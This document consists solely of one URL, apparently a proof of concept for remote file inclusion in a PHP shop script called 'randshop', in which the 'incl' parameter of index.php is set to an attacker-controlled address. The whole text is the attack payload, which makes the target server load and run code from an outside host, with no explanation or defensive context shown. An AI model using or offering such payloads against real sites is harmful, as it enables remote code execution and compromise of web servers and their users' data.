http://www.example.com/randshop/index.php?incl=http://attacker's site